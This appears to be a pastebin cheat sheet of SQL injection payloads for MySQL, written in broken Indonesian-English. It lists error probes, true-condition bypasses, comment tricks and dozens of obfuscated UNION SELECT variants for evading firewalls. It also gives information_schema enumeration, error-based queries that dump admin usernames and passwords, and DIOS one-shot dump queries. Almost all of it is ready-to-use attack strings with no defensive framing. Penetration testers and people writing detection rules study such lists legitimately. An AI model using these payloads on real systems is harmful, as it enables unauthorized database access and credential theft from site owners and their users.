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Sql Injection

a guest
Apr 23rd, 2017
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  1. [~] Chek Eror [~]
  3. 01. '
  4. 02. "
  5. 03. or 1=1
  6. 04. and 1=1
  7. 05. and false
  8. 06. and true
  9. • [Single qiotes]
  10. 01. ' or '1'='1
  11. 02. ' and '1'='1
  12. 03. ' and false
  13. 04. ' and true
  14. • [Double quotes]
  15. 01. " or "1"="1
  16. 02. " and "1"="1
  17. 03. " and false
  18. 04. " and true
  20. [~]Baypass True Condition[~]
  22. or '1
  23. || '1
  24. null' || 'a'=_binary'a
  25. 1' || 'a'=x'61
  26. 1' && '0'=x'30
  27. 1' %26%26 %270%27%3dx'30
  28. 2' && 0.e1=_binary"0
  29. 1 or 1.e1=0b1010
  30. ' || 1 like 1
  31. '-'
  32. "-"
  33. ' || 2 not like 1
  34. 110 or x'30'=48
  35. '1'!=20
  36. 1 or 20!='1'
  37. 2 and 2>0
  38. 3 || 0<1
  39. 12 || 0b1010<0b1011
  40. 0b11 || 0b1010x'30'
  41. 1 or 0b1
  42. 2121/**/||21
  43. 111' or _binary'1
  44. 1 or 2121
  45. 1' or 12 rlike '1
  48. [~] KOMENTAR [~]
  50. 01. -- : MySQL Linux Style
  51. 02. --+ : MySQL Windows Style
  52. 03. # : Hash (URL encode while use)
  53. 04. --+- : SQL Comment
  54. 05. ;%00 : Null Byte
  55. 07. ` : Backtick
  56. 08. -- -
  57. 09. /*
  58. 10. /**/
  59. 11. %23
  60. 12. //
  63. [~] order by [~]
  65. 01. group by -- +
  66. 02. and extractvalue(0x3a,concat(0x3a,(select count(*) from information_schema.columns where table_name='TABLE_NAME_HERE' and table_schema=database())))--+
  67. 03. Procedure Analyse()--+
  68. 04. and (select * from news)=(select 0)--+
  69. 05. /**/ORDER/**/BY/**/
  70. 06. /*!order*/+/*!by*/
  71. 07. /*!ORDER BY*/
  72. 08. /*!50000ORDER BY*/
  73. 09. /*!50000ORDER*//**//*!50000BY*/
  74. 10. /*!12345ORDER*/+/*!BY*/
  77. [~] UNION select [~]
  79. 01. (uNioN)+(sElECt)….
  80. 02. (uNioN+SeleCT)+…
  81. 03. (UnI)(oN)+(SeL)(ecT)+….
  82. 04. union (select 1,2,3,4…)
  83. 05. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  84. 06. %55nion(%53elect 1,2,3)-- -
  85. 07. +union+distinct+select+
  86. 08. +union+distinctROW+select+
  87. 09. /**//*!12345UNION SELECT*//**/
  88. 10. /**//*!50000UNION SELECT*//**/
  89. 11. /**/UNION/**//*!50000SELECT*//**/
  90. 12. /*!50000UniON SeLeCt*/
  91. 13. union /*!50000%53elect*/
  92. 14. +#uNiOn+#sEleCt
  93. 15. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  94. 16. /*!%55NiOn*/ /*!%53eLEct*/
  95. 17. /*!u%6eion*/ /*!se%6cect*/
  96. 18. +un/**/ion+se/**/lect
  97. 19. uni%0bon+se%0blect
  98. 20. %2f**%2funion%2f**%2fselect
  99. 21. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  100. 22. REVERSE(noinu)+REVERSE(tceles)
  101. 24. /*--*/union/*--*/select/*--*/
  102. 25. union (/*!/**/ SeleCT */ 1,2,3)
  103. 26. /*!union*/+/*!select*/
  104. 27. union+/*!select*/
  105. 28. /**/union/**/select/**/
  106. 29. /**/uNIon/**/sEleCt/**/
  107. 30. +%2F**/+Union/*!select*/
  108. 31. /**//*!union*//**//*!select*//**/
  109. 32. /*!uNIOn*/ /*!SelECt*/
  110. 33. +union+distinct+select+
  111. 34. +union+distinctROW+select+
  112. 35. uNiOn aLl sElEcT
  113. 36. UNIunionON+SELselectECT
  114. /**/union/*!50000select*//**/
  115. 0%a0union%a0select%09
  116. %0Aunion%0Aselect%0A
  117. %55nion/**/%53elect
  118. uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  119. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  120. %0A%09UNION%0CSELECT%10NULL%
  121. /*!union*//*--*//*!all*//*--*//*!select*/
  122. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  123. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  124. +UnIoN/*&a=*/SeLeCT/*&a=*/
  125. union+sel%0bect
  126. +uni*on+sel*ect+
  127. +#1q%0Aunion all#qa%0A#%0Aselect
  128. union(select (1),(2),(3),(4),(5))
  129. UNION(SELECT(column)FROM(table))
  130. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  131. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  132. union(select(1),2,3)
  133. union (select 1111,2222,3333)
  134. uNioN (/*!/**/ SeleCT */ 11)
  135. union (select 1111,2222,3333)
  136. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  137. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  138. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  139. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  140. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  141. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  142. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  143. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  144. /union\sselect/g
  145. /union\s+select/i
  146. /*!UnIoN*/SeLeCT
  147. +UnIoN/*&a=*/SeLeCT/*&a=*/
  148. +uni>on+sel>ect+
  149. +(UnIoN)+(SelECT)+
  150. +(UnI)(oN)+(SeL)(EcT)
  151. +’UnI”On’+'SeL”ECT’
  152. +uni on+sel ect+
  153. +/*!UnIoN*/+/*!SeLeCt*/+
  154. /*!u%6eion*/ /*!se%6cect*/
  155. uni%20union%20/*!select*/%20
  156. union%23aa%0Aselect
  157. /**/union/*!50000select*/
  158. /^.*union.*$/ /^.*select.*$/
  159. /*union*/union/*select*/select+
  160. /*uni X on*/union/*sel X ect*/
  161. +un/**/ion+sel/**/ect+
  162. +UnIOn%0d%0aSeleCt%0d%0a
  163. UNION/*&test=1*/SELECT/*&pwn=2*/
  164. un?<ion sel="">+un/**/ion+se/**/lect+
  165. +UNunionION+SEselectLECT+
  167. +uni%0bon+se%0blect+
  168. %252f%252a*/union%252f%252a /select%252f%252a*/
  169. /%2A%2A/union/%2A%2A/select/%2A%2A/
  170. %2f**%2funion%2f**%2fselect%2f**%2f
  171. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  172. /*!UnIoN*/SeLecT+
  174. [~] information_schema.tables [~]
  176. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  177. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  178. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  179. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  180. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  181. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  183. [~] concat() [~]
  185. CoNcAt()
  186. concat()
  187. CON%08CAT()
  188. CoNcAt()
  189. %0AcOnCat()
  190. /**//*!12345cOnCat*/
  191. /*!50000cOnCat*/(/*!*/)
  192. unhex(hex(concat(table_name)))
  193. unhex(hex(/*!12345concat*/(table_name)))
  194. unhex(hex(/*!50000concat*/(table_name)))
  196. [~] group_concat() [~]
  198. /*!group_concat*/()
  199. gRoUp_cOnCAt()
  200. group_concat(/*!*/)
  201. group_concat(/*!12345table_name*/)
  202. group_concat(/*!50000table_name*/)
  203. /*!group_concat*/(/*!12345table_name*/)
  204. /*!group_concat*/(/*!50000table_name*/)
  205. /*!12345group_concat*/(/*!12345table_name*/)
  206. /*!50000group_concat*/(/*!50000table_name*/)
  207. /*!GrOuP_ConCaT*/()
  208. /*!12345GroUP_ConCat*/()
  209. /*!50000gRouP_cOnCaT*/()
  210. /*!50000Gr%6fuP_c%6fnCAT*/()
  211. unhex(hex(group_concat(table_name)))
  212. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  213. unhex(hex(/*!12345group_concat*/(table_name)))
  214. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  215. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  216. unhex(hex(/*!50000group_concat*/(table_name)))
  217. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  218. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  219. convert(group_concat(table_name)+using+ascii)
  220. convert(group_concat(/*!table_name*/)+using+ascii)
  221. convert(group_concat(/*!12345table_name*/)+using+ascii)
  222. convert(group_concat(/*!50000table_name*/)+using+ascii)
  223. CONVERT(group_concat(table_name)+USING+latin1)
  224. CONVERT(group_concat(table_name)+USING+latin2)
  225. CONVERT(group_concat(table_name)+USING+latin3)
  226. CONVERT(group_concat(table_name)+USING+latin4)
  227. CONVERT(group_concat(table_name)+USING+latin5)
  229. [~] Eror based [~]
  231. • Chek versi
  232. = and (select * from (select name_const(version(),1),name_const(version(),1))a)
  233. • Chek user
  234. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  235. • Chek database
  236. = and (select 1 from (select count(*),concat((select(select concat(cast(user() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  237. • Chek Table
  238. = and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  239. • Chek Column
  240. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  241. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  242. = and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e6973747261746f7273 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  244. • Dump data
  245. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  246. = and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_name,0x3a,user_password) as char),0x7e)) from administrators limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  249. [~] Using Xpath [~]
  250. 01. and extractvalue(0x0a,concat(0x0a,(OUR QUERY HERE)))--
  252. [~]DIOS[~]
  254. 01. (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
  255. 02. (select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
  256. 03. (Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
  257. 04. make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
  258. 05. (Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns) where@:=export_set(5,export_set(5,export_set(5,@,table_schema,0x3c6c693e,2),table_name,0xa3a,2),column_name,0xa3a,2)),@,2))
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